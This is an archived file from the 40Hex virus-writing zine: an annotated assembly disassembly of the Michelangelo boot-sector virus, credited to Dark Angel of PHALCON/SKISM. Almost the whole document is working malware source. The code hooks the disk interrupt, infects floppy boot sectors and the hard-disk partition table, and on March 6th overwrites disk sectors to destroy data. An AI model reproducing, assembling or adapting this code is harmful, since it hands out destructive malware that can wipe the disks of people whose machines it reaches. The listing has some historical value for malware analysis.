home *** CD-ROM | disk | FTP | other *** search
/ Hacker 2 / HACKER2.mdf / virus / 40hex_8.006 < prev    next >
Text File  |  1995-01-03  |  9KB  |  239 lines

  1. 40Hex Number 8 Volume 2 Issue 4                                       File 006
  2.  
  3. ; This is a disassembly of the much-hyped michelangelo virus.
  4. ; As you can see, it is a derivative of the Stoned virus.  The
  5. ; junk bytes at the end of the file are probably throwbacks to
  6. ; the Stoned virus.  In any case, it is yet another boot sector
  7. ; and partition table infector.
  8.  
  9. michelangelo    segment byte public
  10.                 assume  cs:michelangelo, ds:michelangelo
  11. ; Disassembly by Dark Angel of PHALCON/SKISM
  12.                 org     0
  13.  
  14.                 jmp     entervirus
  15. highmemjmp      db      0F5h, 00h, 80h, 9Fh
  16. maxhead         db      2                       ; used by damagestuff
  17. firstsector     dw      3
  18. oldint13h       dd      0C8000256h
  19.  
  20. int13h:
  21.                 push    ds
  22.                 push    ax
  23.                 or      dl, dl                  ; default drive?
  24.                 jnz     exitint13h              ; exit if not
  25.                 xor     ax, ax
  26.                 mov     ds, ax
  27.                 test    byte ptr ds:[43fh], 1   ; disk 0 on?
  28.                 jnz     exitint13h              ; if not spinning, exit
  29.                 pop     ax
  30.                 pop     ds
  31.                 pushf
  32.                 call    dword ptr cs:[oldint13h]; first call old int 13h
  33.                 pushf
  34.                 call    infectdisk              ; then infect
  35.                 popf
  36.                 retf    2
  37. exitint13h:     pop     ax
  38.                 pop     ds
  39.                 jmp     dword ptr cs:[oldint13h]
  40.  
  41. infectdisk:
  42.                 push    ax
  43.                 push    bx
  44.                 push    cx
  45.                 push    dx
  46.                 push    ds
  47.                 push    es
  48.                 push    si
  49.                 push    di
  50.                 push    cs
  51.                 pop     ds
  52.                 push    cs
  53.                 pop     es
  54.                 mov     si, 4
  55. readbootblock:
  56.                 mov     ax,201h                 ; Read boot block to
  57.                 mov     bx,200h                 ; after virus
  58.         mov    cx,1
  59.                 xor     dx,dx
  60.                 pushf
  61.                 call    oldint13h
  62.                 jnc     checkinfect             ; continue if no error
  63.                 xor     ax,ax
  64.                 pushf
  65.                 call    oldint13h               ; Reset disk
  66.                 dec     si                      ; loop back
  67.                 jnz     readbootblock
  68.                 jmp     short quitinfect        ; exit if too many failures
  69. checkinfect:
  70.                 xor     si,si
  71.                 cld
  72.                 lodsw
  73.                 cmp     ax,[bx]                 ; check if already infected
  74.                 jne     infectitnow
  75.                 lodsw
  76.                 cmp     ax,[bx+2]               ; check again
  77.                 je      quitinfect
  78. infectitnow:
  79.                 mov     ax,301h                 ; Write old boot block
  80.                 mov     dh,1                    ; to head 1
  81.                 mov     cl,3                    ; sector 3
  82.                 cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
  83.                 je      is360Kdisk
  84.                 mov     cl,0Eh
  85. is360Kdisk:
  86.                 mov     firstsector,cx
  87.                 pushf
  88.                 call    oldint13h
  89.                 jc      quitinfect              ; exit on error
  90.                 mov     si,200h+offset partitioninfo
  91.                 mov     di,offset partitioninfo
  92.                 mov     cx,21h                  ; Copy partition table
  93.                 cld
  94.                 rep     movsw
  95.                 mov     ax,301h                 ; Write virus to sector 1
  96.                 xor     bx,bx
  97.         mov    cx,1
  98.                 xor     dx,dx
  99.                 pushf
  100.                 call    oldint13h
  101. quitinfect:
  102.         pop    di
  103.         pop    si
  104.         pop    es
  105.         pop    ds
  106.         pop    dx
  107.         pop    cx
  108.         pop    bx
  109.         pop    ax
  110.         retn
  111. entervirus:
  112.                 xor     ax,ax
  113.         mov    ds,ax
  114.                 cli
  115.         mov    ss,ax
  116.                 mov     ax,7C00h                ; Set stack to just below
  117.                 mov     sp,ax                   ; virus load point
  118.                 sti
  119.                 push    ds                      ; save 0:7C00h on stack for
  120.                 push    ax                      ; later retf
  121.                 mov     ax,ds:[13h*4]
  122.                 mov     word ptr ds:[7C00h+offset oldint13h],ax
  123.                 mov     ax,ds:[13h*4+2]
  124.                 mov     word ptr ds:[7C00h+offset oldint13h+2],ax
  125.                 mov     ax,ds:[413h]            ; memory size in K
  126.                 dec     ax                      ; 1024 K
  127.         dec    ax
  128.                 mov     ds:[413h],ax            ; move new value in
  129.                 mov     cl,6
  130.                 shl     ax,cl                   ; ax = paragraphs of memory
  131.                 mov     es,ax                   ; next line sets seg of jmp
  132.                 mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
  133.                 mov     ax,offset int13h
  134.                 mov     ds:[13h*4],ax
  135.                 mov     ds:[13h*4+2],es
  136.                 mov     cx,offset partitioninfo
  137.                 mov     si,7C00h
  138.                 xor     di,di
  139.                 cld
  140.                 rep     movsb                   ; copy to high memory
  141.                                                 ; and transfer control there
  142.                 jmp     dword ptr cs:[7C00h+offset highmemjmp]
  143. ; destination of highmem jmp
  144.                 xor     ax,ax
  145.         mov    es,ax
  146.                 int     13h                     ; reset disk
  147.                 push    cs
  148.         pop    ds
  149.         mov    ax,201h
  150.                 mov     bx,7C00h
  151.                 mov     cx,firstsector
  152.                 cmp     cx,7                    ; hard disk infection?
  153.                 jne     floppyboot              ; if not, do floppies
  154.                 mov     dx,80h                  ; Read old partition table of
  155.                 int     13h                     ; first hard disk to 0:7C00h
  156.                 jmp     short exitvirus
  157. floppyboot:
  158.                 mov     cx,firstsector          ; read old boot block
  159.                 mov     dx,100h                 ; to 0:7C00h
  160.                 int     13h
  161.                 jc      exitvirus
  162.         push    cs
  163.         pop    es
  164.                 mov     ax,201h                 ; read boot block
  165.                 mov     bx,200h                 ; of first hard disk
  166.         mov    cx,1
  167.         mov    dx,80h
  168.                 int     13h
  169.                 jc      exitvirus
  170.                 xor     si,si
  171.                 cld
  172.                 lodsw
  173.                 cmp     ax,[bx]                 ; is it infected?
  174.                 jne     infectharddisk          ; if not, infect HD
  175.                 lodsw                           ; check infection
  176.         cmp    ax,[bx+2]
  177.                 jne     infectharddisk
  178. exitvirus:
  179.                 xor     cx,cx                   ; Real time clock get date
  180.                 mov     ah,4                    ; dx = mon/day
  181.                 int     1Ah
  182.                 cmp     dx,306h                 ; March 6th
  183.                 je      damagestuff
  184.                 retf                            ; return control to original
  185.                                                 ; boot block @ 0:7C00h
  186. damagestuff:
  187.                 xor     dx,dx
  188.         mov    cx,1
  189. smashanothersector:
  190.         mov    ax,309h
  191.                 mov     si,firstsector
  192.         cmp    si,3
  193.                 je      smashit
  194.         mov    al,0Eh
  195.         cmp    si,0Eh
  196.                 je      smashit
  197.                 mov     dl,80h                  ; first hard disk
  198.                 mov     maxhead,4
  199.         mov    al,11h
  200. smashit:
  201.                 mov     bx,5000h                ; random memory area
  202.                 mov     es,bx                   ; at 5000h:5000h
  203.                 int     13h                     ; Write al sectors to drive dl
  204.                 jnc     skiponerror             ; skip on error
  205.                 xor     ah,ah                   ; Reset disk drive dl
  206.                 int     13h
  207. skiponerror:
  208.                 inc     dh                      ; next head
  209.                 cmp     dh,maxhead              ; 2 if floppy, 4 if HD
  210.                 jb      smashanothersector
  211.                 xor     dh,dh                   ; go to next head/cylinder
  212.         inc    ch
  213.                 jmp     short smashanothersector
  214. infectharddisk:
  215.                 mov     cx,7                    ; Write partition table to
  216.                 mov     firstsector,cx          ; sector 7
  217.         mov    ax,301h
  218.         mov    dx,80h
  219.                 int     13h
  220.                 jc      exitvirus
  221.                 mov     si,200h+offset partitioninfo ; Copy partition
  222.                 mov     di,offset partitioninfo      ; table information
  223.         mov    cx,21h
  224.                 rep     movsw
  225.                 mov     ax,301h                 ; Write to sector 8
  226.                 xor     bx,bx                   ; Copy virus to sector 1
  227.         inc    cl
  228.                 int     13h
  229. ;*              jmp     short 01E0h
  230.                 db      0EBh, 32h               ; ?This should crash?
  231. ; The following bytes are meaningless.
  232. garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
  233. partitioninfo:  db      42h dup (0)
  234. michelangelo    ends
  235.                 end
  236.  
  237.  
  238. Downloaded From P-80 International Information Systems 304-744-2253
  239.